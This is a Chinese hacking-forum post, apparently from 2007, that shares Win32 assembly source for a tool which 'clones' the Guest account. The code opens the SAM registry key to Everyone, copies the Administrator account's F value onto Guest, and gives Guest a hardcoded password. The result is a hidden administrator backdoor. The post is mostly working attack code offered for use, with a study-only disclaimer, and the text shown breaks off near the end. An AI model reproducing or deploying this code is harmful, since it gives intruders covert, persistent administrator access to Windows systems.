[原创]Win32汇编版 Guest 帐号克隆工具

taiwansee

荣誉会员

Rank: 6 Rank: 6 Rank: 6

帖子: 86
精华: 2
积分: 3589
阅读权限: 100
性别: 男
在线时间: 52 小时
注册时间: 2006-2-6
最后登录: 2008-10-6

发短消息
加为好友
当前离线

楼主大中小发表于 2007-11-16 21:10 只看该作者

[原创]Win32汇编版 Guest 帐号克隆工具

文章作者：taiwansee
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

刚学WIN32汇编不久。。写了个把guest克隆成1f4帐号的小程序。。
在2000/xp/2003/2008 RC0 上测试成功。。
现开放源代码，发现bug请跟贴。。
注意：本文中的代码只做技术学习讨论，不可用作非法用途。

Code Language : ASM

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Win32汇编版 Guest帐号克隆工具
;
; By taiwansee 2007-11-10
;
; 使用 nmake 或下列命令进行编译和链接:
; ml /c /coff Clone.asm
; Link /subsystem:windows Clone.obj
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat, stdcall
option casemap :none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include advapi32.inc
includelib advapi32.lib
include netapi32.inc
includelib netapi32.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.const
DEBUG equ 0
HKLM equ HKEY_LOCAL_MACHINE
if DEBUG
NERR_SUCCESS equ 0
endif
.data?
stExplicitAccess EXPLICIT_ACCESS <>
stUserInfo USER_INFO_1003 <>
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
if DEBUG
szCaption db 'Debug info......',0
szFailed db 'Open Subkey Failed!!!',0
szSuccess db 'Open Subkey Success!!!',0
szCloseSuccess db 'Close Subkey Success!!!',0
szCloseFailed db 'Close Subkey Failed!!!',0
szQueryValueSuccess db 'Query Value Success!!!',0
szQueryValueFailed db 'Query Value Failed!!!',0
szSetValueSuccess db 'Set Value Success!!!',0
szSetValueFailed db 'Set Value Failed!!!',0
szGetNamedSecurityInfoSuccess db 'Get Named Security Info Success!!!',0
szGetNamedSecurityInfoFailed db 'Get Named Security Info Failed!!!',0
szSetEntriesInAclSuccess db 'Set Entries In Acl Success!!!',0
szSetEntriesInAclFailed db 'Set Entries In Acl Failed!!!',0
szSetNamedSecurityInfoSuccess db 'Set Named Security Info Success!!!',0
szSetNamedSecurityInfoFailed db 'Set Named Security Info Failed!!!',0
szLocalFreeFailed1 db 'Local Free @lpSecurityDescriptor Failed!!!',0
szLocalFreeFailed2 db 'Local Free @lpOldDACL Failed!!!',0
szLocalFreeFailed3 db 'Local Free @lpNewDACL Failed!!!',0
szNetUserSetInfoSuccess db 'Net User Set Info Success!!!',0
szERROR_ACCESS_DENIED db 'szERROR_ACCESS_DENIED',0
szNERR_InvalidComputer db 'szNERR_InvalidComputer',0
szNERR_NotPrimary db 'szNERR_NotPrimary',0
szNERR_UserNotFound db 'szNERR_UserNotFound',0
szNERR_PasswordTooShort db 'szNERR_PasswordTooShort',0
szNetUserChangePasswordSuccess db 'szNetUserChangePasswordSuccess',0
szNetUserChangePasswordOtherError db 'szNetUserChangePasswordOtherError',0
szNERR_LastAdmin db 'szNERR_LastAdmin',0
szNERR_BadPassword db 'szNERR_BadPassword',0
szNERR_SpeGroupOp db 'szNERR_SpeGroupOp',0
szBuffer db 2048 dup(0)
szFormat db '%d',0
endif
szValueName db 'F',0
szObject db 'MACHINE\SAM\SAM',0
szAccessUser db 'Everyone',0
szSystemUser db 'System',0
szSubKey1 db 'SAM\SAM\Domains\Account\Users\000001F4',0
szSubKey2 db 'SAM\SAM\Domains\Account\Users\000001F5',0
szUserPassword dw 'E','v','i','l','o','c','t','a','l','2','0','0','7',00
szAccountName dw 'g','u','e','s','t',00
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
_SetAccountPassword proc
local @lpError:dword
local @lpNULL:dword
mov stUserInfo.usri1003_password,offset szUserPassword
invoke NetUserSetInfo,NULL,\
offset szAccountName,\
1003,\
offset stUserInfo,\
NULL
if DEBUG
.if eax==ERROR_ACCESS_DENIED
invoke MessageBox,NULL,offset szERROR_ACCESS_DENIED,offset szCaption,MB_OK
.elseif eax==NERR_InvalidComputer
invoke MessageBox,NULL,offset szNERR_InvalidComputer,offset szCaption,MB_OK
.elseif eax==NERR_NotPrimary
invoke MessageBox,NULL,offset szNERR_NotPrimary,offset szCaption,MB_OK
.elseif eax==NERR_UserNotFound
invoke MessageBox,NULL,offset szNERR_UserNotFound,offset szCaption,MB_OK
.elseif eax==NERR_PasswordTooShort
invoke MessageBox,NULL,offset szNERR_PasswordTooShort,offset szCaption,MB_OK
.elseif eax==NERR_SpeGroupOp
invoke MessageBox,NULL,offset szNERR_SpeGroupOp,offset szCaption,MB_OK
.elseif eax==NERR_BadPassword
invoke MessageBox,NULL,offset szNERR_BadPassword,offset szCaption,MB_OK
.elseif eax==NERR_LastAdmin
invoke MessageBox,NULL,offset szNERR_LastAdmin,offset szCaption,MB_OK
.elseif eax==NERR_SUCCESS
invoke MessageBox,NULL,offset szNetUserChangePasswordSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szNetUserChangePasswordOtherError,offset szCaption,MB_OK
.endif
endif
ret
_SetAccountPassword endp
_Clone proc
local @hSubkey1:dword,\
@hSubkey2:dword,\
@szBuffer[4096]:byte,\
@szDataType:dword,\
@szDataBuffer[4096]:byte,\
@szDataBufferSize:dword,\
@lpOldDACL:dword,\
@lpNewDACL:dword,\
@lpSecurityDescriptor:dword
pushad
;首先获取SAM主键的DACL
invoke GetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
addr @lpOldDACL,\
NULL,\
addr @lpSecurityDescriptor
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szGetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szGetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;清空EXPLICIT_ACCESS结构
invoke RtlZeroMemory,offset stExplicitAccess,sizeof stExplicitAccess
;创建一个ACE，允许Everyone完全控制对象，并允许子对象继承此权限
mov esi,offset stExplicitAccess
assume esi:ptr EXPLICIT_ACCESS
mov [esi].grfAccessPermissions,KEY_ALL_ACCESS
mov [esi].grfAccessMode,SET_ACCESS
mov [esi].grfInheritance,SUB_CONTAINERS_AND_OBJECTS_INHERIT;允许子对象继承此权限
mov [esi].Trustee.pMultipleTrustee,NULL
mov [esi].Trustee.MultipleTrusteeOperation,NO_MULTIPLE_TRUSTEE
mov [esi].Trustee.TrusteeForm,TRUSTEE_IS_NAME
mov [esi].Trustee.TrusteeType,TRUSTEE_IS_GROUP
mov [esi].Trustee.ptstrName,offset szAccessUser
;将新的ACE加入DACL
invoke SetEntriesInAcl,1,\
offset stExplicitAccess,\
@lpOldDACL,\
addr @lpNewDACL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetEntriesInAclSuccess,offset szCaption,MB_OK
.else
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
invoke MessageBox,NULL,offset szSetEntriesInAclFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;更新SAM主键的DACL
invoke SetNamedSecurityInfo,offset szObject,\
SE_REGISTRY_KEY,\
DACL_SECURITY_INFORMATION,\
NULL,\
NULL,\
@lpNewDACL,\
NULL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetNamedSecurityInfoSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szSetNamedSecurityInfoFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
mov @szDataBufferSize,sizeof @szDataBuffer
;打开目标子键1
invoke RegOpenKeyEx,HKLM,offset szSubKey1,\
0,\
KEY_ALL_ACCESS,\
addr @hSubkey1
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;打开目标子键2
invoke RegOpenKeyEx,HKLM,offset szSubKey2,\
0,\
KEY_ALL_ACCESS,\
addr @hSubkey2
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
;查询目标键值1
invoke RegQueryValueEx,@hSubkey1,\
offset szValueName,\
0,\
addr @szDataType,\
addr @szDataBuffer,\
addr @szDataBufferSize
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szQueryValueSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szQueryValueFailed,offset szCaption,MB_OK
jmp @F
.endif
invoke wsprintf,addr @szBuffer,offset szFormat,@szDataBufferSize
invoke MessageBox,NULL,addr @szBuffer,offset szCaption,MB_OK
endif
;设置目标键值2
invoke RegSetValueEx,@hSubkey2,\
offset szValueName,\
0,\
REG_BINARY,\
addr @szDataBuffer,\
@szDataBufferSize
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetValueSuccess,offset szCaption,MB_OK
.else
push eax
invoke MessageBox,NULL,offset szSetValueFailed,offset szCaption,MB_OK
pop eax
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
jmp @F
.endif
endif
invoke RegCloseKey,@hSubkey1
invoke RegCloseKey,@hSubkey2
if DEBUG
.if eax==ERROR_SUCCESS
invoke MessageBox,NULL,offset szCloseSuccess,offset szCaption,MB_OK
.else
invoke MessageBox,NULL,offset szCloseFailed,offset szCaption,MB_OK
.endif
endif
;恢复原来的DACL，只要修改下用户组即可
mov [esi].Trustee.ptstrName,offset szSystemUser
assume esi:nothing
;将新的ACE加入DACL
invoke SetEntriesInAcl,1,\
offset stExplicitAccess,\
NULL,\
addr @lpOldDACL
if DEBUG
.if eax == ERROR_SUCCESS
invoke MessageBox,NULL,offset szSetEntriesInAclSuccess,offset szCaption,MB_OK
.else
invoke wsprintf,offset szBuffer,offset szFormat,eax
invoke MessageBox,NULL,offset szBuffer,offset szCaption,MB_OK
invoke MessageBox,NULL,offset szSetEntriesInAclFailed,offset szCaption,MB_OK
jmp @F
.endif
endif
<